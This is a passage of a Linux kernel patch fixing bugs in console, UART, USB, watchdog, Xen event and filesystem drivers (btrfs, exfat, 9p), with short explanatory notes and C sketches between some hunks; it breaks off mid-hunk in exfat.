+ #ifdef CONFIG_HVC_XEN_FRONTEND
+ static void xencons_disconnect_backend(struct xencons_info *info)
+ {
+-	if (info->irq > 0)
+-		unbind_from_irqhandler(info->irq, NULL);
+-	info->irq = 0;
++	if (info->hvc != NULL)
++		hvc_remove(info->hvc);
++	info->hvc = NULL;
++	if (info->irq > 0) {
++		evtchn_put(info->evtchn);
++		info->irq = 0;
++		info->evtchn = 0;
++	}
++	/* evtchn_put() will also close it so this is only an error path */
+ 	if (info->evtchn > 0)
+ 		xenbus_free_evtchn(info->xbdev, info->evtchn);
+ 	info->evtchn = 0;
+ 	if (info->gntref > 0)
+ 		gnttab_free_grant_references(info->gntref);
+ 	info->gntref = 0;
+-	if (info->hvc != NULL)
+-		hvc_remove(info->hvc);
+-	info->hvc = NULL;
+ }
+ 
+ static void xencons_free(struct xencons_info *info)
+@@ -433,7 +436,7 @@ static int xencons_connect_backend(struct xenbus_device *dev,
+ 	if (ret)
+ 		return ret;
+ 	info->evtchn = evtchn;
+-	irq = bind_interdomain_evtchn_to_irq_lateeoi(dev, evtchn);
++	irq = bind_evtchn_to_irq_lateeoi(evtchn);
+ 	if (irq < 0)
+ 		return irq;
+ 	info->irq = irq;
+@@ -553,10 +556,23 @@ static void xencons_backend_changed(struct xenbus_device *dev,
+ 		if (dev->state == XenbusStateClosed)
+ 			break;
+ 		fallthrough;	/* Missed the backend's CLOSING state */
+-	case XenbusStateClosing:
++	case XenbusStateClosing: {
++		struct xencons_info *info = dev_get_drvdata(&dev->dev);
++
++		/*
++		 * Don't tear down the evtchn and grant ref before the other
++		 * end has disconnected, but do stop userspace from trying
++		 * to use the device before we allow the backend to close.
++		 */
++		if (info->hvc) {
++			hvc_remove(info->hvc);
++			info->hvc = NULL;
++		}
++
+ 		xenbus_frontend_closed(dev);
+ 		break;
+ 	}
++	}
+ }
+ 
+ static const struct xenbus_device_id xencons_ids[] = {
+@@ -588,7 +604,7 @@ static int __init xen_hvc_init(void)
+ 		ops = &dom0_hvc_ops;
+ 		r = xen_initial_domain_console_init();
+ 		if (r < 0)
+-			return r;
++			goto register_fe;
+ 		info = vtermno_to_xencons(HVC_COOKIE);
+ 	} else {
+ 		ops = &domU_hvc_ops;
+@@ -597,7 +613,7 @@ static int __init xen_hvc_init(void)
+ 		else
+ 			r = xen_pv_console_init();
+ 		if (r < 0)
+-			return r;
++			goto register_fe;
+ 
+ 		info = vtermno_to_xencons(HVC_COOKIE);
+ 		info->irq = bind_evtchn_to_irq_lateeoi(info->evtchn);
+@@ -616,12 +632,13 @@ static int __init xen_hvc_init(void)
+ 		list_del(&info->list);
+ 		spin_unlock_irqrestore(&xencons_lock, flags);
+ 		if (info->irq)
+-			unbind_from_irqhandler(info->irq, NULL);
++			evtchn_put(info->evtchn);
+ 		kfree(info);
+ 		return r;
+ 	}
+ 
+ 	r = 0;
++ register_fe:
+ #ifdef CONFIG_HVC_XEN_FRONTEND
+ 	r = xenbus_register_frontend(&xencons_driver);
+ #endif
+diff --git a/drivers/tty/serial/meson_uart.c b/drivers/tty/serial/meson_uart.c
+index 056243c12836c..8f6d54c04b9ba 100644
+--- a/drivers/tty/serial/meson_uart.c
++++ b/drivers/tty/serial/meson_uart.c
+@@ -380,10 +380,14 @@ static void meson_uart_set_termios(struct uart_port *port,
+ 	else
+ 		val |= AML_UART_STOP_BIT_1SB;
+ 
+-	if (cflags & CRTSCTS)
+-		val &= ~AML_UART_TWO_WIRE_EN;
+-	else
++	if (cflags & CRTSCTS) {
++		if (port->flags & UPF_HARD_FLOW)
++			val &= ~AML_UART_TWO_WIRE_EN;
++		else
++			termios->c_cflag &= ~CRTSCTS;
++	} else {
+ 		val |= AML_UART_TWO_WIRE_EN;
++	}
+ 
+ 	writel(val, port->membase + AML_UART_CONTROL);
+ 
+@@ -698,6 +702,7 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 	u32 fifosize = 64; /* Default is 64, 128 for EE UART_0 */
+ 	int ret = 0;
+ 	int irq;
++	bool has_rtscts;
+ 
+ 	if (pdev->dev.of_node)
+ 		pdev->id = of_alias_get_id(pdev->dev.of_node, "serial");
+@@ -725,6 +730,7 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 		return irq;
+ 
+ 	of_property_read_u32(pdev->dev.of_node, "fifo-size", &fifosize);
++	has_rtscts = of_property_read_bool(pdev->dev.of_node, "uart-has-rtscts");
+ 
+ 	if (meson_ports[pdev->id]) {
+ 		dev_err(&pdev->dev, "port %d already allocated\n", pdev->id);
+@@ -744,6 +750,8 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 	port->mapsize = resource_size(res_mem);
+ 	port->irq = irq;
+ 	port->flags = UPF_BOOT_AUTOCONF | UPF_LOW_LATENCY;
++	if (has_rtscts)
++		port->flags |= UPF_HARD_FLOW;
+ 	port->has_sysrq = IS_ENABLED(CONFIG_SERIAL_MESON_CONSOLE);
+ 	port->dev = &pdev->dev;
+ 	port->line = pdev->id;
+diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
+index d2b2720db6ca7..248067197287a 100644
+--- a/drivers/tty/sysrq.c
++++ b/drivers/tty/sysrq.c
+@@ -263,13 +263,14 @@ static void sysrq_handle_showallcpus(int key)
+ 		if (in_hardirq())
+ 			regs = get_irq_regs();
+ 
+-		pr_info("CPU%d:\n", smp_processor_id());
++		pr_info("CPU%d:\n", get_cpu());
+ 		if (regs)
+ 			show_regs(regs);
+ 		else
+ 			show_stack(NULL, NULL, KERN_INFO);
+ 
+ 		schedule_work(&sysrq_showallcpus);
++		put_cpu();
+ 	}
+ }
+ 
+diff --git a/drivers/tty/vcc.c b/drivers/tty/vcc.c
+index 34ba6e54789a7..b8b832c75b856 100644
+--- a/drivers/tty/vcc.c
++++ b/drivers/tty/vcc.c
+@@ -579,18 +579,22 @@ static int vcc_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 		return -ENOMEM;
+ 
+ 	name = kstrdup(dev_name(&vdev->dev), GFP_KERNEL);
++	if (!name) {
++		rv = -ENOMEM;
++		goto free_port;
++	}
+ 
+ 	rv = vio_driver_init(&port->vio, vdev, VDEV_CONSOLE_CON, vcc_versions,
+ 			     ARRAY_SIZE(vcc_versions), NULL, name);
+ 	if (rv)
+-		goto free_port;
++		goto free_name;
+ 
+ 	port->vio.debug = vcc_dbg_vio;
+ 	vcc_ldc_cfg.debug = vcc_dbg_ldc;
+ 
+ 	rv = vio_ldc_alloc(&port->vio, &vcc_ldc_cfg, port);
+ 	if (rv)
+-		goto free_port;
++		goto free_name;
+ 
+ 	spin_lock_init(&port->lock);
+ 
+@@ -624,6 +628,11 @@ static int vcc_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 		goto unreg_tty;
+ 	}
+ 	port->domain = kstrdup(domain, GFP_KERNEL);
++	if (!port->domain) {
++		rv = -ENOMEM;
++		goto unreg_tty;
++	}
++
+ 
+ 	mdesc_release(hp);
+ 
+@@ -653,8 +662,9 @@ free_table:
+ 	vcc_table_remove(port->index);
+ free_ldc:
+ 	vio_ldc_free(&port->vio);
+-free_port:
++free_name:
+ 	kfree(name);
++free_port:
+ 	kfree(port);
+ 
+ 	return rv;
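
The vcc_probe() hunk above adds the missing NULL check for kstrdup() and splits the error unwind so that the name buffer is only freed once it actually exists. This is the classic one-label-per-resource goto unwind; a minimal standalone sketch of the shape (names invented for illustration, not taken from the driver):

#include <stdlib.h>
#include <string.h>

/* Each error label releases exactly what was acquired before the
 * failure point, in reverse order of acquisition. */
static int probe_like(const char *devname, char **out_name, char **out_port)
{
	char *port = malloc(64);	/* stands in for the port struct */
	if (!port)
		return -1;

	char *name = strdup(devname);	/* the allocation the fix NULL-checks */
	if (!name)
		goto free_port;

	if (strlen(name) > 63)		/* stands in for vio_driver_init() etc. */
		goto free_name;

	*out_name = name;
	*out_port = port;
	return 0;

free_name:				/* new label, mirroring the patch */
	free(name);
free_port:
	free(port);
	return -1;
}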
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 57e2f4cc744f7..a811db88eedae 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1111,6 +1111,111 @@ static void dwc3_set_power_down_clk_scale(struct dwc3 *dwc)
+ 	}
+ }
+ 
++static void dwc3_config_threshold(struct dwc3 *dwc)
++{
++	u32 reg;
++	u8 rx_thr_num;
++	u8 rx_maxburst;
++	u8 tx_thr_num;
++	u8 tx_maxburst;
++
++	/*
++	 * Must config both number of packets and max burst settings to enable
++	 * RX and/or TX threshold.
++	 */
++	if (!DWC3_IP_IS(DWC3) && dwc->dr_mode == USB_DR_MODE_HOST) {
++		rx_thr_num = dwc->rx_thr_num_pkt_prd;
++		rx_maxburst = dwc->rx_max_burst_prd;
++		tx_thr_num = dwc->tx_thr_num_pkt_prd;
++		tx_maxburst = dwc->tx_max_burst_prd;
++
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC31_RXTHRNUMPKTSEL_PRD;
++
++			reg &= ~DWC31_RXTHRNUMPKT_PRD(~0);
++			reg |= DWC31_RXTHRNUMPKT_PRD(rx_thr_num);
++
++			reg &= ~DWC31_MAXRXBURSTSIZE_PRD(~0);
++			reg |= DWC31_MAXRXBURSTSIZE_PRD(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC31_TXTHRNUMPKTSEL_PRD;
++
++			reg &= ~DWC31_TXTHRNUMPKT_PRD(~0);
++			reg |= DWC31_TXTHRNUMPKT_PRD(tx_thr_num);
++
++			reg &= ~DWC31_MAXTXBURSTSIZE_PRD(~0);
++			reg |= DWC31_MAXTXBURSTSIZE_PRD(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	}
++
++	rx_thr_num = dwc->rx_thr_num_pkt;
++	rx_maxburst = dwc->rx_max_burst;
++	tx_thr_num = dwc->tx_thr_num_pkt;
++	tx_maxburst = dwc->tx_max_burst;
++
++	if (DWC3_IP_IS(DWC3)) {
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC3_GRXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC3_GRXTHRCFG_RXPKTCNT(~0);
++			reg |= DWC3_GRXTHRCFG_RXPKTCNT(rx_thr_num);
++
++			reg &= ~DWC3_GRXTHRCFG_MAXRXBURSTSIZE(~0);
++			reg |= DWC3_GRXTHRCFG_MAXRXBURSTSIZE(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC3_GTXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC3_GTXTHRCFG_TXPKTCNT(~0);
++			reg |= DWC3_GTXTHRCFG_TXPKTCNT(tx_thr_num);
++
++			reg &= ~DWC3_GTXTHRCFG_MAXTXBURSTSIZE(~0);
++			reg |= DWC3_GTXTHRCFG_MAXTXBURSTSIZE(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	} else {
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC31_GRXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC31_GRXTHRCFG_RXPKTCNT(~0);
++			reg |= DWC31_GRXTHRCFG_RXPKTCNT(rx_thr_num);
++
++			reg &= ~DWC31_GRXTHRCFG_MAXRXBURSTSIZE(~0);
++			reg |= DWC31_GRXTHRCFG_MAXRXBURSTSIZE(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC31_GTXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC31_GTXTHRCFG_TXPKTCNT(~0);
++			reg |= DWC31_GTXTHRCFG_TXPKTCNT(tx_thr_num);
++
++			reg &= ~DWC31_GTXTHRCFG_MAXTXBURSTSIZE(~0);
++			reg |= DWC31_GTXTHRCFG_MAXTXBURSTSIZE(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	}
++}
++
+ /**
+  * dwc3_core_init - Low-level initialization of DWC3 Core
+  * @dwc: Pointer to our controller context structure
+@@ -1278,42 +1383,7 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL1, reg);
+ 	}
+ 
+-	/*
+-	 * Must config both number of packets and max burst settings to enable
+-	 * RX and/or TX threshold.
+-	 */
+-	if (!DWC3_IP_IS(DWC3) && dwc->dr_mode == USB_DR_MODE_HOST) {
+-		u8 rx_thr_num = dwc->rx_thr_num_pkt_prd;
+-		u8 rx_maxburst = dwc->rx_max_burst_prd;
+-		u8 tx_thr_num = dwc->tx_thr_num_pkt_prd;
+-		u8 tx_maxburst = dwc->tx_max_burst_prd;
+-
+-		if (rx_thr_num && rx_maxburst) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
+-			reg |= DWC31_RXTHRNUMPKTSEL_PRD;
+-
+-			reg &= ~DWC31_RXTHRNUMPKT_PRD(~0);
+-			reg |= DWC31_RXTHRNUMPKT_PRD(rx_thr_num);
+-
+-			reg &= ~DWC31_MAXRXBURSTSIZE_PRD(~0);
+-			reg |= DWC31_MAXRXBURSTSIZE_PRD(rx_maxburst);
+-
+-			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
+-		}
+-
+-		if (tx_thr_num && tx_maxburst) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
+-			reg |= DWC31_TXTHRNUMPKTSEL_PRD;
+-
+-			reg &= ~DWC31_TXTHRNUMPKT_PRD(~0);
+-			reg |= DWC31_TXTHRNUMPKT_PRD(tx_thr_num);
+-
+-			reg &= ~DWC31_MAXTXBURSTSIZE_PRD(~0);
+-			reg |= DWC31_MAXTXBURSTSIZE_PRD(tx_maxburst);
+-
+-			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
+-		}
+-	}
++	dwc3_config_threshold(dwc);
+ 
+ 	return 0;
+ 
+@@ -1462,6 +1532,10 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 	u8			lpm_nyet_threshold;
+ 	u8			tx_de_emphasis;
+ 	u8			hird_threshold;
++	u8			rx_thr_num_pkt = 0;
++	u8			rx_max_burst = 0;
++	u8			tx_thr_num_pkt = 0;
++	u8			tx_max_burst = 0;
+ 	u8			rx_thr_num_pkt_prd = 0;
+ 	u8			rx_max_burst_prd = 0;
+ 	u8			tx_thr_num_pkt_prd = 0;
+@@ -1524,6 +1598,14 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 				"snps,usb2-lpm-disable");
+ 	dwc->usb2_gadget_lpm_disable = device_property_read_bool(dev,
+ 				"snps,usb2-gadget-lpm-disable");
++	device_property_read_u8(dev, "snps,rx-thr-num-pkt",
++				&rx_thr_num_pkt);
++	device_property_read_u8(dev, "snps,rx-max-burst",
++				&rx_max_burst);
++	device_property_read_u8(dev, "snps,tx-thr-num-pkt",
++				&tx_thr_num_pkt);
++	device_property_read_u8(dev, "snps,tx-max-burst",
++				&tx_max_burst);
+ 	device_property_read_u8(dev, "snps,rx-thr-num-pkt-prd",
+ 				&rx_thr_num_pkt_prd);
+ 	device_property_read_u8(dev, "snps,rx-max-burst-prd",
+@@ -1601,6 +1683,12 @@ static void dwc3_get_properties(struct dwc3 *dwc)
+ 
+ 	dwc->hird_threshold = hird_threshold;
+ 
++	dwc->rx_thr_num_pkt = rx_thr_num_pkt;
++	dwc->rx_max_burst = rx_max_burst;
++
++	dwc->tx_thr_num_pkt = tx_thr_num_pkt;
++	dwc->tx_max_burst = tx_max_burst;
++
+ 	dwc->rx_thr_num_pkt_prd = rx_thr_num_pkt_prd;
+ 	dwc->rx_max_burst_prd = rx_max_burst_prd;
+ 
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 80cc532ba9d55..889c122dad457 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -209,6 +209,11 @@
+ #define DWC3_GRXTHRCFG_RXPKTCNT(n) (((n) & 0xf) << 24)
+ #define DWC3_GRXTHRCFG_PKTCNTSEL BIT(29)
+ 
++/* Global TX Threshold Configuration Register */
++#define DWC3_GTXTHRCFG_MAXTXBURSTSIZE(n) (((n) & 0xff) << 16)
++#define DWC3_GTXTHRCFG_TXPKTCNT(n) (((n) & 0xf) << 24)
++#define DWC3_GTXTHRCFG_PKTCNTSEL BIT(29)
++
+ /* Global RX Threshold Configuration Register for DWC_usb31 only */
+ #define DWC31_GRXTHRCFG_MAXRXBURSTSIZE(n)	(((n) & 0x1f) << 16)
+ #define DWC31_GRXTHRCFG_RXPKTCNT(n)		(((n) & 0x1f) << 21)
+@@ -1041,6 +1046,10 @@ struct dwc3_scratchpad_array {
+  * @test_mode_nr: test feature selector
+  * @lpm_nyet_threshold: LPM NYET response threshold
+  * @hird_threshold: HIRD threshold
++ * @rx_thr_num_pkt: USB receive packet count
++ * @rx_max_burst: max USB receive burst size
++ * @tx_thr_num_pkt: USB transmit packet count
++ * @tx_max_burst: max USB transmit burst size
+  * @rx_thr_num_pkt_prd: periodic ESS receive packet count
+  * @rx_max_burst_prd: max periodic ESS receive burst size
+  * @tx_thr_num_pkt_prd: periodic ESS transmit packet count
+@@ -1268,6 +1277,10 @@ struct dwc3 {
+ 	u8			test_mode_nr;
+ 	u8			lpm_nyet_threshold;
+ 	u8			hird_threshold;
++	u8			rx_thr_num_pkt;
++	u8			rx_max_burst;
++	u8			tx_thr_num_pkt;
++	u8			tx_max_burst;
+ 	u8			rx_thr_num_pkt_prd;
+ 	u8			rx_max_burst_prd;
+ 	u8			tx_thr_num_pkt_prd;
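
Every branch of the new dwc3_config_threshold() repeats one read-modify-write idiom: passing ~0 through a field macro yields the field's full mask, which is cleared before the new value is ORed in, leaving all other register bits untouched. A standalone sketch of the idiom (the field macro here is made up, not one of the DWC3 definitions):

#include <stdint.h>
#include <stdio.h>

/* Hypothetical 4-bit packet-count field occupying bits 24..27. */
#define PKTCNT(n)	(((uint32_t)(n) & 0xf) << 24)

static uint32_t set_pktcnt(uint32_t reg, uint8_t count)
{
	reg &= ~PKTCNT(~0);	/* PKTCNT(~0) is the full field mask; clear it */
	reg |= PKTCNT(count);	/* insert the new field value */
	return reg;
}

int main(void)
{
	/* Only bits 24..27 change: 0xdeadbeef becomes 0xd3adbeef. */
	printf("0x%08x\n", (unsigned)set_pktcnt(0xdeadbeef, 3));
	return 0;
}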
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index faf90a2174194..bbb6ff6b11aa1 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1425,7 +1425,7 @@ static int ncm_bind(struct usb_configuration *c, struct usb_function *f)
+ 	struct usb_composite_dev *cdev = c->cdev;
+ 	struct f_ncm		*ncm = func_to_ncm(f);
+ 	struct usb_string	*us;
+-	int			status;
++	int			status = 0;
+ 	struct usb_ep		*ep;
+ 	struct f_ncm_opts	*ncm_opts;
+ 
+@@ -1443,22 +1443,17 @@ static int ncm_bind(struct usb_configuration *c, struct usb_function *f)
+ 		f->os_desc_table[0].os_desc = &ncm_opts->ncm_os_desc;
+ 	}
+ 
+-	/*
+-	 * in drivers/usb/gadget/configfs.c:configfs_composite_bind()
+-	 * configurations are bound in sequence with list_for_each_entry,
+-	 * in each configuration its functions are bound in sequence
+-	 * with list_for_each_entry, so we assume no race condition
+-	 * with regard to ncm_opts->bound access
+-	 */
+-	if (!ncm_opts->bound) {
+-		mutex_lock(&ncm_opts->lock);
+-		gether_set_gadget(ncm_opts->net, cdev->gadget);
++	mutex_lock(&ncm_opts->lock);
++	gether_set_gadget(ncm_opts->net, cdev->gadget);
++	if (!ncm_opts->bound)
+ 		status = gether_register_netdev(ncm_opts->net);
+-		mutex_unlock(&ncm_opts->lock);
+-		if (status)
+-			goto fail;
+-		ncm_opts->bound = true;
+-	}
++	mutex_unlock(&ncm_opts->lock);
++
++	if (status)
++		goto fail;
++
++	ncm_opts->bound = true;
++
+ 	us = usb_gstrings_attach(cdev, ncm_strings,
+ 				 ARRAY_SIZE(ncm_string_defs));
+ 	if (IS_ERR(us)) {
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index c4dd648710ae0..24bcf6ab12d8a 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -508,7 +508,9 @@ static int xhci_pci_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	/* USB-2 and USB-3 roothubs initialized, allow runtime pm suspend */
+ 	pm_runtime_put_noidle(&dev->dev);
+ 
+-	if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
++	if (pci_choose_state(dev, PMSG_SUSPEND) == PCI_D0)
++		pm_runtime_forbid(&dev->dev);
++	else if (xhci->quirks & XHCI_DEFAULT_PM_RUNTIME_ALLOW)
+ 		pm_runtime_allow(&dev->dev);
+ 
+ 	dma_set_max_seg_size(&dev->dev, UINT_MAX);
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 31a156669a531..c8374527a27d9 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -1427,7 +1427,6 @@ static int vhost_vdpa_probe(struct vdpa_device *vdpa)
+ 
+ err:
+ 	put_device(&v->dev);
+-	ida_simple_remove(&vhost_vdpa_ida, v->minor);
+ 	return r;
+ }
+ 
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 63862803421f1..7bf28545b47a0 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -153,14 +153,14 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+-		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
++		sbsa_gwdt_reg_write((u64)gwdt->clk * timeout, gwdt);
+ 	else
+ 		/*
+ 		 * In single stage mode, the first signal (WS0) is ignored and
+ 		 * the timeout is (WOR * 2), so WOR should be configured to
+ 		 * half of the timeout value.
+ 		 */
+-		sbsa_gwdt_reg_write(gwdt->clk / 2 * timeout, gwdt);
++		sbsa_gwdt_reg_write(((u64)gwdt->clk / 2) * timeout, gwdt);
+ 
+ 	return 0;
+ }
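
The sbsa_gwdt change is a 32-bit multiply overflow fix: gwdt->clk (Hz) times timeout (seconds) was evaluated in 32-bit arithmetic before reaching the 64-bit register write, so large products wrapped. Casting one operand to u64 promotes the whole multiply. A standalone illustration (the 400 MHz clock and 600 s timeout are example figures, not from the driver):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t clk = 400000000;	/* 400 MHz system counter */
	uint32_t timeout = 600;		/* seconds */

	uint64_t wrong = clk * timeout;		  /* 32-bit multiply, wraps */
	uint64_t right = (uint64_t)clk * timeout; /* full 64-bit multiply */

	/* right = 240000000000; wrong = that mod 2^32 = 3776798720 */
	printf("wrong=%llu right=%llu\n",
	       (unsigned long long)wrong, (unsigned long long)right);
	return 0;
}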
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index 80b46de14f413..af9115d648092 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -600,7 +600,9 @@ static void lateeoi_list_add(struct irq_info *info)
+ 
+ 	spin_lock_irqsave(&eoi->eoi_list_lock, flags);
+ 
+-	if (list_empty(&eoi->eoi_list)) {
++	elem = list_first_entry_or_null(&eoi->eoi_list, struct irq_info,
++					eoi_list);
++	if (!elem || info->eoi_time < elem->eoi_time) {
+ 		list_add(&info->eoi_list, &eoi->eoi_list);
+ 		mod_delayed_work_on(info->eoi_cpu, system_wq,
+ 				    &eoi->delayed, delay);
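
The events_base hunk teaches lateeoi_list_add() to compare against the current list head instead of only handling an empty list: an entry with an earlier eoi_time is inserted at the front and the delayed work is re-armed for the new earliest deadline. The same idea in a generic sorted insert (plain singly linked list, not the kernel list API):

#include <stddef.h>

struct ev {
	unsigned long eoi_time;		/* deadline; ascending order kept */
	struct ev *next;
};

/* Insert keeping ascending eoi_time; returns 1 if the head changed,
 * meaning the caller must re-arm its timer for the new earliest entry. */
static int insert_sorted(struct ev **head, struct ev *e)
{
	if (!*head || e->eoi_time < (*head)->eoi_time) {
		e->next = *head;
		*head = e;
		return 1;
	}

	struct ev *p = *head;
	while (p->next && p->next->eoi_time <= e->eoi_time)
		p = p->next;
	e->next = p->next;
	p->next = e;
	return 0;
}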
+diff --git a/fs/9p/xattr.c b/fs/9p/xattr.c
+index 2807bb63f7802..3b9aa61de8c2d 100644
+--- a/fs/9p/xattr.c
++++ b/fs/9p/xattr.c
+@@ -65,7 +65,7 @@ ssize_t v9fs_xattr_get(struct dentry *dentry, const char *name,
+ 	struct p9_fid *fid;
+ 	int ret;
+ 
+-	p9_debug(P9_DEBUG_VFS, "name = %s value_len = %zu\n",
++	p9_debug(P9_DEBUG_VFS, "name = '%s' value_len = %zu\n",
+ 		 name, buffer_size);
+ 	fid = v9fs_fid_lookup(dentry);
+ 	if (IS_ERR(fid))
+@@ -136,7 +136,8 @@ int v9fs_fid_xattr_set(struct p9_fid *fid, const char *name,
+ 
+ ssize_t v9fs_listxattr(struct dentry *dentry, char *buffer, size_t buffer_size)
+ {
+-	return v9fs_xattr_get(dentry, NULL, buffer, buffer_size);
++	/* Txattrwalk with an empty string lists xattrs instead */
++	return v9fs_xattr_get(dentry, "", buffer, buffer_size);
+ }
+ 
+ static int v9fs_xattr_handler_get(const struct xattr_handler *handler,
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index 118b2e20b2e19..0b62ce77053f5 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -320,9 +320,6 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	} else {
+ 		if (current->journal_info)
+ 			flush = BTRFS_RESERVE_FLUSH_LIMIT;
+-
+-		if (btrfs_transaction_in_commit(fs_info))
+-			schedule_timeout(1);
+ 	}
+ 
+ 	num_bytes = ALIGN(num_bytes, fs_info->sectorsize);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 4063447217f92..81eac121c6b23 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -7166,8 +7166,15 @@ static struct extent_map *btrfs_new_extent_direct(struct btrfs_inode *inode,
+ 	int ret;
+ 
+ 	alloc_hint = get_extent_allocation_hint(inode, start, len);
++again:
+ 	ret = btrfs_reserve_extent(root, len, len, fs_info->sectorsize,
+ 				   0, alloc_hint, &ins, 1, 1);
++	if (ret == -EAGAIN) {
++		ASSERT(btrfs_is_zoned(fs_info));
++		wait_on_bit_io(&inode->root->fs_info->flags, BTRFS_FS_NEED_ZONE_FINISH,
++			       TASK_UNINTERRUPTIBLE);
++		goto again;
++	}
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+diff --git a/fs/exfat/namei.c b/fs/exfat/namei.c
+index 90b0477911449..30e97c51f0e14 100644
+--- a/fs/exfat/namei.c
++++ b/fs/exfat/namei.c
+@@ -338,14 +338,20 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		if (exfat_check_max_dentries(inode))
+ 			return -ENOSPC;
+ 
+-		/* we trust p_dir->size regardless of FAT type */
+-		if (exfat_find_last_cluster(sb, p_dir, &last_clu))
+-			return -EIO;
+-
+ 		/*
+ 		 * Allocate new cluster to this directory
+ 		 */
+-		exfat_chain_set(&clu, last_clu + 1, 0, p_dir->flags);
++		if (ei->start_clu != EXFAT_EOF_CLUSTER) {
++			/* we trust p_dir->size regardless of FAT type */
++			if (exfat_find_last_cluster(sb, p_dir, &last_clu))
++				return -EIO;
++
++			exfat_chain_set(&clu, last_clu + 1, 0, p_dir->flags);
++		} else {
++			/* This directory is empty */
++			exfat_chain_set(&clu, EXFAT_EOF_CLUSTER, 0,
++					ALLOC_NO_FAT_CHAIN);
++		}
+ 
+ 		/* allocate a cluster */
+ 		ret = exfat_alloc_cluster(inode, 1, &clu, IS_DIRSYNC(inode));
+@@ -355,6 +361,11 @@ static int exfat_find_empty_entry(struct inode *inode,
+ 		if (exfat_zeroed_cluster(inode, clu.dir))
+ 			return -EIO;
+ 
++		if (ei->start_clu == EXFAT_EOF_CLUSTER) {
++			ei->start_clu = clu.dir;
++			p_dir->dir = clu.dir;
++		}
++
+ 		/* append to the FAT chain */
+ 		if (clu.flags != p_dir->flags) {
+ 			/* no-fat-chain bit is disabled,
+@@ -644,7 +655,7 @@ static int exfat_find(struct inode *dir, struct qstr *qname,
+ 	info->type = exfat_get_entry_type(ep);
+ 	info->attr = le16_to_cpu(ep->dentry.file.attr);
+ 	info->size = le64_to_cpu(ep2->dentry.stream.valid_size);
+-	if ((info->type == TYPE_FILE) && (info->size == 0)) {
